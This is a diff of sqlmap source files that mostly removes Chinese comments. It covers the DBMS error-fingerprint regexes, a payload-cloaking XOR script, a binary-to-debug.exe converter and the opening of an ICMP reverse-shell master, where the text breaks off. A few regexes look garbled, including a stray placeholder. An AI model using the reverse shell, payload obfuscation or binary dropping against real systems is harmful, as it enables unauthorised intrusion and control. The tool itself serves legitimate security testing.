+        <error regexp="nl\.cwi\.monetdb\.jdbc"/>
    </dbms>
-</root>
-

-<?xml version="1.0" encoding="UTF-8"?>  <!-- 声明XML文档的版本为1.0，编码使用UTF-8 -->
-
-<root>  <!-- 根元素，包含所有其他元素 -->
-    <dbms value="Microsoft Access">  <!-- 定义数据库管理系统为Microsoft Access -->
-        <error regexp="Microsoft Access (\d+ )?Driver"/>  <!-- 匹配包含"Microsoft Access"和"Driver"的错误信息，支持可选的版本号 -->
-        <error regexp="JET Database Engine"/>  <!-- 匹配JET数据库引擎的错误信息 -->
-        <error regexp="Access Database Engine"/>  <!-- 匹配Access数据库引擎的错误信息 -->
-        <error regexp="ODBC Microsoft Access"/>  <!-- 匹配ODBC与Microsoft Access相关的错误信息 -->
-        <error regexp="Syntax error $missing operator$ in query expression"/>  <!-- 匹配查询表达式中缺失操作符的语法错误 -->
-    </dbms>
-
-    <dbms value="Oracle">  <!-- 定义数据库管理系统为Oracle -->
-        <error regexp="\bORA-\d{5}"/>  <!-- 匹配ORA错误代码，后跟五位数字 -->
-        <error regexp="Oracle error"/>  <!-- 匹配通用的Oracle错误信息 -->
-        <error regexp="Oracle.*?Driver"/>  <!-- 匹配与Oracle驱动相关的错误信息 -->
-        <error regexp="Warning.*?\W(oci|ora)_"/>  <!-- 匹配OCI或ORA相关的警告信息 -->
-        <error regexp="quoted string not properly terminated"/>  <!-- 匹配未正确结束的引用字符串的错误信息 -->
-        <error regexp="SQL command not properly ended"/>  <!-- 匹配SQL命令未正确结束的错误信息 -->
-        <error regexp="macromedia\.jdbc\.oracle"/>  <!-- 匹配Macromedia的Oracle JDBC驱动的错误信息 -->
-        <error regexp="oracle\.jdbc"/>  <!-- 匹配Oracle JDBC驱动的错误信息 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>  <!-- 匹配Zend框架中Oracle相关的异常信息 -->
-        <error regexp="Pdo[./_\\](Oracle|OCI)"/>  <!-- 匹配PDO的Oracle或OCI驱动的错误信息 -->
-        <error regexp="OracleException"/>  <!-- 匹配Oracle异常的错误信息 -->
+    <dbms value="Apache Derby">
+        <error regexp="Syntax error: Encountered"/>
+        <error regexp="org\.apache\.derby"/>
+        <error regexp="ERROR 42X01"/>
    </dbms>

-    <dbms value="IBM DB2">  <!-- 定义数据库管理系统为IBM DB2 -->
-        <error regexp="CLI Driver.*?DB2"/>  <!-- 匹配DB2 CLI驱动的错误信息 -->
-        <error regexp="DB2 SQL error"/>  <!-- 匹配DB2 SQL错误的通用错误信息 -->
-        <error regexp="\bdb2_\w+\(" />  <!-- 匹配DB2相关函数调用的错误信息 -->
-        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>  <!-- 匹配包含SQLCODE和SQLSTATE的错误信息 -->
-        <error regexp="com\.ibm\.db2\.jcc"/>  <!-- 匹配IBM DB2 JCC驱动的错误信息 -->
-        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>  <!-- 匹配Zend框架中DB2相关的异常信息 -->
-        <error regexp="Pdo[./_\\]Ibm"/>  <!-- 匹配PDO IBM DB2驱动的错误信息 -->
-        <error regexp="DB2Exception"/>  <!-- 匹配DB2异常的错误信息 -->
-        <error regexp="ibm_db_dbi\.ProgrammingError"/>  <!-- 匹配ibm_db_dbi模块中的编程错误信息 -->
+    <dbms value="Vertica">
+        <error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
+        <error regexp="/vertica/Parser/scan"/>
+        <error regexp="com\.vertica\.jdbc"/>
+        <error regexp="org\.jkiss\.dbeaver\.ext\.vertica"/>
+        <error regexp="com\.vertica\.dsi\.dataengine"/>
    </dbms>

-    <dbms value="Informix">  <!-- 定义数据库管理系统为Informix -->
-        <error regexp="Warning.*?\Wifx_"/>  <!-- 匹配Informix扩展相关的警告信息 -->
-        <error regexp="Exception.*?Informix"/>  <!-- 匹配Informix相关的异常信息 -->
-        <error regexp="Informix ODBC Driver"/>  <!-- 匹配Informix ODBC驱动的错误信息 -->
-        <error regexp="ODBC Informix driver"/>  <!-- 匹配ODBC Informix驱动的错误信息 -->
-        <error regexp="com\.informix\.jdbc"/>  <!-- 匹配Informix JDBC驱动的错误信息 -->
-        <error regexp="weblogic\.jdbc\.informix"/>  <!-- 匹配WebLogic中Informix JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Informix"/>  <!-- 匹配PDO Informix驱动的错误信息 -->
-        <error regexp="IfxException"/>  <!-- 匹配Informix异常的错误信息 -->
-    </dbms>
-
-    <!-- Interbase/Firebird -->
-    <dbms value="Firebird">  <!-- 定义数据库管理系统为Firebird -->
-        <error regexp="Dynamic SQL Error"/>  <!-- 匹配动态SQL错误的错误信息 -->
-        <error regexp="Warning.*?\Wibase_"/>  <!-- 匹配Firebird扩展相关的警告信息 -->
-        <error regexp="org\.firebirdsql\.jdbc"/>  <!-- 匹配Firebird SQL JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Firebird"/>  <!-- 匹配PDO Firebird驱动的错误信息 -->
+    <dbms value="Mckoi">
+        <error regexp="com\.mckoi\.JDBCDriver"/>
+        <error regexp="com\.mckoi\.database\.jdbc"/>
+        <error regexp="&lt;REGEX_LITERAL&gt;"/>
    </dbms>

-    <dbms value="SQLite">  <!-- 定义数据库管理系统为SQLite -->
-        <error regexp="SQLite/JDBCDriver"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
-        <error regexp="SQLite\.Exception"/>  <!-- 匹配SQLite异常的错误信息 -->
-        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>  <!-- 匹配Microsoft或System Data的SQLite异常信息 -->
-        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>  <!-- 匹配与SQLite或SQLite3相关的警告信息 -->
-        <error regexp="$SQLITE_ERROR$"/>  <!-- 匹配SQLite错误的错误信息 -->
-        <error regexp="SQLite error \d+:"/>  <!-- 匹配SQLite错误代码的信息 -->
-        <error regexp="sqlite3.OperationalError:"/>  <!-- 匹配SQLite3操作错误的信息 -->
-        <error regexp="SQLite3::SQLException"/>  <!-- 匹配SQLite3 SQL异常的信息 -->
-        <error regexp="org\.sqlite\.JDBC"/>  <!-- 匹配SQLite JDBC驱动的错误信息 -->
-        <error regexp="Pdo[./_\\]Sqlite"/>  <!-- 匹配PDO SQLite驱动的错误信息 -->
-        <error regexp="SQLiteException"/>  <!-- 匹配SQLite异常的错误信息 -->
+    <dbms value="Presto">
+        <error regexp="com\.facebook\.presto\.jdbc"/>
+        <error regexp="io\.prestosql\.jdbc"/>
+        <error regexp="com\.simba\.presto\.jdbc"/>
+        <error regexp="UNION query has different number of fields: \d+, \d+"/>
+        <error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
    </dbms>

-    <dbms value="SAP MaxDB">  <!-- 定义数据库管理系统为SAP MaxDB -->
-        <error regexp="SQL error.*?POS([0-9]+)"/>  <!-- 匹配SQL错误信息，并捕捉位置编号 -->
-        <error regexp="Warning.*?\Wmaxdb_"/>  <!-- 匹配MaxDB扩展相关的警告信息 -->
-        <error regexp="DriverSapDB"/>  <!-- 匹配SapDB驱动的错误信息 -->
-        <error regexp="-3014.*?Invalid end of SQL statement"/>  <!-- 匹配SQL语句无效结束的错误信息 -->
-        <error regexp="com\.sap\.dbtech\.jdbc"/>  <!-- 匹配SAP DBTech JDBC驱动的错误信息 -->
-        <error regexp="$-3008$.*?: Invalid keyword or missing delimiter"/>  <!-- 匹配无效关键字或缺失分隔符的错误信息 -->
+    <dbms value="Altibase">
+        <error regexp="Altibase\.jdbc\.driver"/>
    </dbms>

-    <dbms value="Sybase">  <!-- 定义数据库管理系统为Sybase -->
-        <error regexp="Warning.*?\Wsybase_"/>  <!-- 匹配Sybase扩展相关的警告信息 -->
-        <error regexp="Sybase message"/>  <!-- 匹配Sybase消息的错误信息 -->
-        <error regexp="Sybase.*?Server message"/>  <!-- 匹配Sybase服务器消息的错误信息 -->
-        <error regexp="SybSQLException"/>  <!-- 匹配Sybase异常的错误信息 -->
-        <error regexp="Sybase\.Data\.AseClient"/>  <!-- 匹配Sybase .NET AseClient的错误信息 -->
-        <error regexp="com\.sybase\.jdbc"/>  <!-- 匹配Sybase JDBC驱动的错误信息 -->
+    <dbms value="MimerSQL">
+        <error regexp="com\.mimer\.jdbc"/>
+        <error regexp="Syntax error,[^\n]+assumed to mean"/>
    </dbms>

-    <dbms value="Ingres">  <!-- 定义数据库管理系统为Ingres -->
-        <error regexp="Warning.*?\Wingres_"/>  <!-- 匹配Ingres扩展相关的警告信息 -->
-        <error regexp="Ingres SQLSTATE"/>  <!-- 匹配Ingres SQLSTATE的错误信息 -->
-        <error regexp="Ingres\W.*?Driver"/>  <!-- 匹配Ingres驱动的错误信息 -->
-        <error regexp="com\.ingres\.gcf\.jdbc"/>  <!-- 匹配Ingres GCF JDBC驱动的错误信息 -->
+    <dbms value="ClickHouse">
+        <error regexp="Code: \d+. DB::Exception:"/>
+        <error regexp="Syntax error: failed at position \d+"/>
    </dbms>

-    <dbms value="FrontBase">  <!-- 定义数据库管理系统为FrontBase -->
-        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>  <!-- 匹配回滚事务的异常信息 -->
-        <error regexp="com\.frontbase\.jdbc"/>  <!-- 匹配FrontBase JDBC驱动的错误信息 -->
-        <error regexp="Syntax error 1. Missing"/>  <!-- 匹配语法错误，未找到某些内容 -->
-        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>  <!-- 匹配语义或语法错误，后跟特定的错误码 -->
+    <dbms value="CrateDB">
+        <error regexp="io\.crate\.client\.jdbc"/>
    </dbms>

-    <dbms value="HSQLDB">  <!-- 定义数据库管理系统为HSQLDB -->
-        <error regexp="Unexpected end of command in statement $"/>  <!-- 匹配在SQL语句中指令意外结束的错误信息 -->
-        <error regexp="Unexpected token.*?in statement \["/>  <!-- 匹配在SQL语句中意外标记的错误信息 -->
-        <error regexp="org\.hsqldb\.jdbc"/>  <!-- 匹配HSQLDB JDBC驱动的错误信息 -->
+    <dbms value="Cache">
+        <error regexp="encountered after end of query"/>
+        <error regexp="A comparison operator is required here"/>
    </dbms>

-    <dbms value="H2">  <!-- 定义数据库管理系统为H2 -->
-        <error regexp="org\.h2\.jdbc"/>  <!-- 匹配H2 JDBC驱动的错误信息 -->
-        <error regexp="\[42000-192$"/>  <!-- 匹配H2特定错误代码的信息 -->
+    <dbms value="Raima Database Manager">
+        <error regexp="-10048: Syntax error"/>
+        <error regexp="rdmStmtPrepare\(.+?\) returned"/>
    </dbms>

-    <dbms value="MonetDB">  <!-- 定义数据库管理系统为MonetDB -->
-        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>  <!-- 匹配包含特定错误前缀的MonetDB错误信息 -->
-        <error regexp="$MonetDB$\[ODBC Driver"/>  <!-- 匹配MonetDB ODBC驱动的错误信息 -->
-        <error regexp="nl\.cwi\.monetdb\.jdbc"/>  <!-- 匹配MonetDB JDBC驱动的错误信息 -->
+    <dbms value="Virtuoso">
+        <error regexp="SQ074: Line \d+:"/>
+        <error regexp="SR185: Undefined procedure"/>
+        <error regexp="SQ200: No table "/>
+        <error regexp="Virtuoso S0002 Error"/>
+        <error regexp="\[(Virtuoso Driver|Virtuoso iODBC Driver)\]\[Virtuoso Server\]"/>
    </dbms>
 </root>
--- a/src/sqlmap-master/data/xml/queries.xml
+++ b/src/sqlmap-master/data/xml/queries.xml
--- a/src/sqlmap-master/extra/beep/beep.py
+++ b/src/sqlmap-master/extra/beep/beep.py
@ -9,114 +9,96 @@ See the file 'LICENSE' for copying permission

 import os
 import sys
-import wave  # 用于处理 WAV 文件格式
+import wave

-# 指定蜂鸣音频文件的路径
 BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")

 def beep():
-    """根据操作系统播放蜂鸣声。"""
    try:
-        # 检测操作系统并调用相应的播放方法
        if sys.platform.startswith("win"):
-            _win_wav_play(BEEP_WAV_FILENAME)  # Windows 系统使用 WAV 播放
+            _win_wav_play(BEEP_WAV_FILENAME)
        elif sys.platform.startswith("darwin"):
-            _mac_beep()  # macOS 系统使用系统蜂鸣
+            _mac_beep()
        elif sys.platform.startswith("cygwin"):
-            _cygwin_beep(BEEP_WAV_FILENAME)  # Cygwin 使用音频文件播放
+            _cygwin_beep(BEEP_WAV_FILENAME)
        elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")):
-            _linux_wav_play(BEEP_WAV_FILENAME)  # Linux 和 FreeBSD 系统使用 WAV 播放
+            _linux_wav_play(BEEP_WAV_FILENAME)
        else:
-            _speaker_beep()  # 其他系统使用控制台蜂鸣
+            _speaker_beep()
    except:
-        # 捕获异常并使用控制台蜂鸣
        _speaker_beep()

 def _speaker_beep():
-    """在控制台播放蜂鸣声（警报声）。"""
-    sys.stdout.write('\a')  # 在现代 Linux 系统上可能无效
+    sys.stdout.write('\a')  # doesn't work on modern Linux systems

    try:
-        sys.stdout.flush()  # 尝试刷新标准输出
+        sys.stdout.flush()
    except IOError:
-        pass  # 忽略任何 I/O 错误
+        pass

-# Cygwin 使用系统命令播放音频文件
+# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html
 def _cygwin_beep(filename):
    os.system("play-sound-file '%s' 2>/dev/null" % filename)

-# macOS 系统使用 Carbon 库的 SysBeep 函数
 def _mac_beep():
-    import Carbon.Snd  # 导入 Carbon 库
-    Carbon.Snd.SysBeep(1)  # 播放系统蜂鸣声
+    import Carbon.Snd
+    Carbon.Snd.SysBeep(1)

-# Windows 系统播放 WAV 文件
 def _win_wav_play(filename):
-    import winsound  # 导入 winsound 库
+    import winsound

-    winsound.PlaySound(filename, winsound.SND_FILENAME)  # 播放指定的 WAV 文件
+    winsound.PlaySound(filename, winsound.SND_FILENAME)

-# Linux 系统播放 WAV 文件的实现
 def _linux_wav_play(filename):
-    # 尝试使用不同的命令播放音频文件
    for _ in ("aplay", "paplay", "play"):
        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
-            return  # 成功播放音乐后返回
+            return

-    import ctypes  # 导入 ctypes 库以调用 C 函数
+    import ctypes

-    # PulseAudio 的相关常量定义
    PA_STREAM_PLAYBACK = 1
    PA_SAMPLE_S16LE = 3
-    BUFFSIZE = 1024  # 缓冲区大小
+    BUFFSIZE = 1024

-    # 定义 PulseAudio 样本规格的结构
    class struct_pa_sample_spec(ctypes.Structure):
        _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]

    try:
-        pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")  # 加载 PulseAudio 库
+        pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
    except OSError:
-        return  # 如果加载失败，则返回
+        return

-    # 打开 WAV 文件
    wave_file = wave.open(filename, "rb")

-    # 设置 PulseAudio 样本规格
    pa_sample_spec = struct_pa_sample_spec()
-    pa_sample_spec.rate = wave_file.getframerate()  # 获取采样频率
-    pa_sample_spec.channels = wave_file.getnchannels()  # 获取声道数
-    pa_sample_spec.format = PA_SAMPLE_S16LE  # 设置样本格式
+    pa_sample_spec.rate = wave_file.getframerate()
+    pa_sample_spec.channels = wave_file.getnchannels()
+    pa_sample_spec.format = PA_SAMPLE_S16LE

    error = ctypes.c_int(0)

-    # 创建 PulseAudio 流
-    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None,
-                                  "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
+    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
    if not pa_stream:
        raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))

    while True:
-        # 获取延迟
        latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
        if latency == -1:
            raise Exception("Getting latency failed")

-        buf = wave_file.readframes(BUFFSIZE)  # 从 WAV 文件读取帧
+        buf = wave_file.readframes(BUFFSIZE)
        if not buf:
-            break  # 如果没有更多帧可读，退出循环
+            break

-        # 播放读取的帧
        if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
            raise Exception("Could not play file")

-    wave_file.close()  # 关闭 WAV 文件
+    wave_file.close()

-    # 确保所有数据都已播放完成
    if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
        raise Exception("Could not simple drain")

-    pa.pa_simple_free(pa_stream)  # 释放 PulseAudio 流资源
+    pa.pa_simple_free(pa_stream)

 if __name__ == "__main__":
-    beep()  # 调用蜂鸣函数
+    beep()
--- a/src/sqlmap-master/extra/cloak/cloak.py
+++ b/src/sqlmap-master/extra/cloak/cloak.py
@ -7,99 +7,82 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-from __future__ import print_function  # 兼容 Python 2 和 3 的 print 函数
+from __future__ import print_function

 import os
 import struct
 import sys
-import zlib  # 用于数据压缩和解压缩
+import zlib

 from optparse import OptionError
 from optparse import OptionParser

-# 在 Python 3 中定义 xrange 和 ord 的兼容
 if sys.version_info >= (3, 0):
-    xrange = range  # 使用 Python 3 的 range
-    ord = lambda _: _  # 在 Python 3 中直接使用字符
+    xrange = range
+    ord = lambda _: _

-KEY = b"E6wRbVhD0IBeCiGJ"  # 定义加密/解密的密钥
+KEY = b"E6wRbVhD0IBeCiGJ"

 def xor(message, key):
-    """执行 XOR 操作，返回加密或解密后的字节序列。"""
-    # 对 message 的每个字节进行 XOR 运算，并返回字节串
    return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))

 def cloak(inputFile=None, data=None):
-    """对输入文件或数据进行加密和压缩。"""
    if data is None:
-        # 如果没有提供数据，则读取文件内容
        with open(inputFile, "rb") as f:
-            data = f.read()  # 以二进制模式读取文件数据
+            data = f.read()

-    # 对数据进行压缩后再使用 XOR 加密
    return xor(zlib.compress(data), KEY)

 def decloak(inputFile=None, data=None):
-    """对输入文件或数据进行解密和解压缩。"""
    if data is None:
-        # 如果没有提供数据，则读取文件内容
        with open(inputFile, "rb") as f:
            data = f.read()
-
    try:
-        # 首先对数据进行 XOR 解密，然后解压缩
        data = zlib.decompress(xor(data, KEY))
    except Exception as ex:
-        # 如果解压缩过程中发生异常，打印错误信息并退出
        print(ex)
        print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
        sys.exit(1)
    finally:
-        f.close()  # 确保文件流被关闭
+        f.close()

-    return data  # 返回解密后的数据
+    return data

 def main():
-    """主函数，负责解析命令行参数并执行加密或解密操作。"""
-    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]  # 使用说明
-    parser = OptionParser(usage=usage, version='0.2')  # 创建 OptionParser 对象
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
+    parser = OptionParser(usage=usage, version='0.2')

    try:
-        # 添加命令行选项
-        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')  # 解密选项
-        parser.add_option('-i', dest='inputFile', help='Input file')  # 输入文件选项
-        parser.add_option('-o', dest='outputFile', help='Output file')  # 输出文件选项
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')

-        (args, _) = parser.parse_args()  # 解析命令行参数
+        (args, _) = parser.parse_args()

        if not args.inputFile:
-            parser.error('Missing the input file, -h for help')  # 如果未提供输入文件，则报错
+            parser.error('Missing the input file, -h for help')

    except (OptionError, TypeError) as ex:
-        parser.error(ex)  # 捕获解析错误
+        parser.error(ex)

-    # 检查输入文件是否存在
    if not os.path.isfile(args.inputFile):
        print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile)
        sys.exit(1)

-    # 根据是否需要解密选择处理函数
    if not args.decrypt:
-        data = cloak(args.inputFile)  # 加密文件内容
+        data = cloak(args.inputFile)
    else:
-        data = decloak(args.inputFile)  # 解密文件内容
+        data = decloak(args.inputFile)

-    # 如果未指定输出文件名，则根据是否解密自动生成
    if not args.outputFile:
        if not args.decrypt:
-            args.outputFile = args.inputFile + '_'  # 添加后缀表示加密
+            args.outputFile = args.inputFile + '_'
        else:
-            args.outputFile = args.inputFile[:-1]  # 移除后缀表示解密
+            args.outputFile = args.inputFile[:-1]

-    # 写入结果到输出文件
    f = open(args.outputFile, 'wb')
-    f.write(data)  # 写入数据
-    f.close()  # 关闭文件
+    f.write(data)
+    f.close()

 if __name__ == '__main__':
-    main()  # 程序入口
+    main()
--- a/src/sqlmap-master/extra/dbgtool/dbgtool.py
+++ b/src/sqlmap-master/extra/dbgtool/dbgtool.py
@ -7,7 +7,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-from __future__ import print_function  # 兼容 Python 2 和 3 的 print 函数
+from __future__ import print_function

 import os
 import sys
@ -16,97 +16,81 @@ from optparse import OptionError
 from optparse import OptionParser

 def convert(inputFile):
-    """将给定的二进制输入文件转换为 ASCII 调试脚本。"""
-    fileStat = os.stat(inputFile)  # 获取文件状态
-    fileSize = fileStat.st_size  # 获取文件大小
+    fileStat = os.stat(inputFile)
+    fileSize = fileStat.st_size

-    # 检查文件大小是否超过 65280 字节（可调试的最大限制）
    if fileSize > 65280:
        print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile)
-        sys.exit(1)  # 如果文件太大，退出程序
+        sys.exit(1)

-    # 开始构建调试脚本
-    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))  # 设置脚本名称
-    script += "%x\nf 0100 ffff 00\n" % fileSize  # 写入文件大小信息
-    scrString = ""  # 用于构建写入命令
-    counter = 256  # 地址计数器从 256 开始
-    counter2 = 0  # 0 计数器，用于控制输出的字符数
+    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
+    script += "%x\nf 0100 ffff 00\n" % fileSize
+    scrString = ""
+    counter = 256
+    counter2 = 0

-    # 读取输入文件的二进制内容
    fp = open(inputFile, "rb")
-    fileContent = fp.read()  # 读取所有内容
+    fileContent = fp.read()

-    # 遍历文件的每个字节
    for fileChar in fileContent:
-        # 在 Python 3 中字符是字节，直接使用；在 Python 2 中需要使用 ord() 函数
        unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar)

-        # 如果字符不是空字节（0），则进行处理
        if unsignedFileChar != 0:
-            counter2 += 1  # 增加有效字符计数
+            counter2 += 1

            if not scrString:
-                # 如果 scrString 为空，开始创建新的写入命令
                scrString = "e %0x %02x" % (counter, unsignedFileChar)
            else:
-                # 否则，将字符附加到 scrString 中
                scrString += " %02x" % unsignedFileChar
        elif scrString:
-            # 如果遇到空字节，且 scrString 中有内容，需要把当前 scrString 添加到脚本
            script += "%s\n" % scrString
-            scrString = ""  # 清空 scrString
-            counter2 = 0  # 重置有效字符计数
+            scrString = ""
+            counter2 = 0

-        counter += 1  # 增加地址计数器
+        counter += 1

-        # 每 20 个有效字符输出一次
        if counter2 == 20:
-            script += "%s\n" % scrString  # 将当前 scrString 加入脚本
-            scrString = ""  # 清空 scrString
-            counter2 = 0  # 重置计数
+            script += "%s\n" % scrString
+            scrString = ""
+            counter2 = 0

-    # 完成脚本，添加结束指令
    script += "w\nq\n"

-    return script  # 返回生成的调试脚本
+    return script

 def main(inputFile, outputFile):
-    """主功能，处理文件输入输出。"""
-    # 检查输入文件是否是常规文件
    if not os.path.isfile(inputFile):
        print("ERROR: the provided input file '%s' is not a regular file" % inputFile)
-        sys.exit(1)  # 如果不是，退出程序
+        sys.exit(1)

-    # 调用转换函数
    script = convert(inputFile)

-    # 如果提供了输出文件，写入脚本
    if outputFile:
-        with open(outputFile, "w") as fpOut:
-            sys.stdout = fpOut  # 将标准输出重定向到输出文件
-            sys.stdout.write(script)  # 写入脚本内容
-            sys.stdout.close()  # 关闭文件
+        fpOut = open(outputFile, "w")
+        sys.stdout = fpOut
+        sys.stdout.write(script)
+        sys.stdout.close()
    else:
-        print(script)  # 如果没有输出文件，直接打印脚本
+        print(script)

 if __name__ == "__main__":
-    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]  # 程序用法说明
-    parser = OptionParser(usage=usage, version="0.1")  # 创建解析器
+    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
+    parser = OptionParser(usage=usage, version="0.1")

    try:
-        # 添加命令行选项
-        parser.add_option("-i", dest="inputFile", help="Input binary file")  # 输入文件
-        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")  # 输出文件
+        parser.add_option("-i", dest="inputFile", help="Input binary file")
+
+        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")

-        (args, _) = parser.parse_args()  # 解析参数
+        (args, _) = parser.parse_args()

        if not args.inputFile:
-            parser.error("Missing the input file, -h for help")  # 必须提供输入文件
+            parser.error("Missing the input file, -h for help")

    except (OptionError, TypeError) as ex:
-        parser.error(ex)  # 捕获错误并报告
+        parser.error(ex)

-    inputFile = args.inputFile  # 输入文件名
-    outputFile = args.outputFile  # 输出文件名
+    inputFile = args.inputFile
+    outputFile = args.outputFile

-    main(inputFile, outputFile)  # 调用主函数
+    main(inputFile, outputFile)
--- a/src/sqlmap-master/extra/icmpsh/icmpsh_m.py
+++ b/src/sqlmap-master/extra/icmpsh/icmpsh_m.py
@ -5,6 +5,7 @@
 #
 #  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
 #
+#
 #  This program is free software: you can redistribute it and/or modify
 #  it under the terms of the GNU General Public License as published by
 #  the Free Software Foundation, either version 3 of the License, or
@ -27,117 +28,117 @@ def setNonBlocking(fd):
    """
    Make a file descriptor non-blocking
    """
-    import fcntl  # 导入用于文件控制选项的库

-    flags = fcntl.fcntl(fd, fcntl.F_GETFL)  # 获取当前文件描述符的状态标志
-    flags = flags | os.O_NONBLOCK  # 将非阻塞标志添加到当前标志
-    fcntl.fcntl(fd, fcntl.F_SETFL, flags)  # 设置文件描述符为非阻塞模式
+    import fcntl
+
+    flags = fcntl.fcntl(fd, fcntl.F_GETFL)
+    flags = flags | os.O_NONBLOCK
+    fcntl.fcntl(fd, fcntl.F_SETFL, flags)

 def main(src, dst):
-    """主程序函数，用于设置 ICMP socket 和处理命令。"""
    if sys.platform == "nt":
-        sys.stderr.write('icmpsh master can only run on Posix systems\n')  # 检查是否在 Windows 上运行
+        sys.stderr.write('icmpsh master can only run on Posix systems\n')
        sys.exit(255)

    try:
-        from impacket import ImpactDecoder  # 导入 Impacket 库用于解析数据包
-        from impacket import ImpactPacket  # 导入 Impacket 用于构建数据包
+        from impacket import ImpactDecoder
+        from impacket import ImpactPacket
    except ImportError:
-        sys.stderr.write('You need to install Python Impacket library first\n')  # 检查是否安装 Impacket
+        sys.stderr.write('You need to install Python Impacket library first\n')
        sys.exit(255)

-    # 将标准输入设置为非阻塞
-    stdin_fd = sys.stdin.fileno()  # 获取标准输入的文件描述符
+    # Make standard input a non-blocking file
+    stdin_fd = sys.stdin.fileno()
    setNonBlocking(stdin_fd)

-    # 为 ICMP 协议打开一个 socket
+    # Open one socket for ICMP protocol
+    # A special option is set on the socket so that IP headers are included
+    # with the returned data
    try:
-        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)  # 创建原始 ICMP socket
+        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except socket.error:
-        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')  # 检查运行权限
+        sys.stderr.write('You need to run icmpsh master with administrator privileges\n')
        sys.exit(1)

-    sock.setblocking(0)  # 设置 socket 为非阻塞模式
-    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  # 启用 IP 头包含在发送包中
+    sock.setblocking(0)
+    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

-    # 创建一个新的 IP 包，设置源和目的地址
+    # Create a new IP packet and set its source and destination addresses
    ip = ImpactPacket.IP()
-    ip.set_ip_src(src)  # 设置源 IP
-    ip.set_ip_dst(dst)  # 设置目标 IP
+    ip.set_ip_src(src)
+    ip.set_ip_dst(dst)

-    # 创建一个新的 ICMP 包，类型为回显应答（ECHO REPLY）
+    # Create a new ICMP packet of type ECHO REPLY
    icmp = ImpactPacket.ICMP()
    icmp.set_icmp_type(icmp.ICMP_ECHOREPLY)

-    # 实例化 IP 数据包解码器
+    # Instantiate an IP packets decoder
    decoder = ImpactDecoder.IPDecoder()

-    # 在无限循环中发送和接收命令
    while True:
        try:
            cmd = ''

-            # 等待输入的回复
-            if sock in select.select([sock], [], [])[0]:  # 监控 socket 是否可读
-                buff = sock.recv(4096)  # 接收最大 4096 字节的数据
+            # Wait for incoming replies
+            if sock in select.select([sock], [], [])[0]:
+                buff = sock.recv(4096)

                if 0 == len(buff):
-                    # 如果接收到的数据长度为 0，说明对方关闭了 socket
+                    # Socket remotely closed
                    sock.close()
                    sys.exit(0)

-                # 解析接收到的数据包
-                ippacket = decoder.decode(buff)  # 解码 IP 包
-                icmppacket = ippacket.child()  # 获取 ICMP 包
+                # Packet received; decode and display it
+                ippacket = decoder.decode(buff)
+                icmppacket = ippacket.child()

-                # 检查 ICMP 数据包的源和目的地址以及类型
+                # If the packet matches, report it to the user
                if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type():
-                    # 获取标识符和序列号
+                    # Get identifier and sequence number
                    ident = icmppacket.get_icmp_id()
                    seq_id = icmppacket.get_icmp_seq()
-                    data = icmppacket.get_data_as_string()  # 获取数据
+                    data = icmppacket.get_data_as_string()

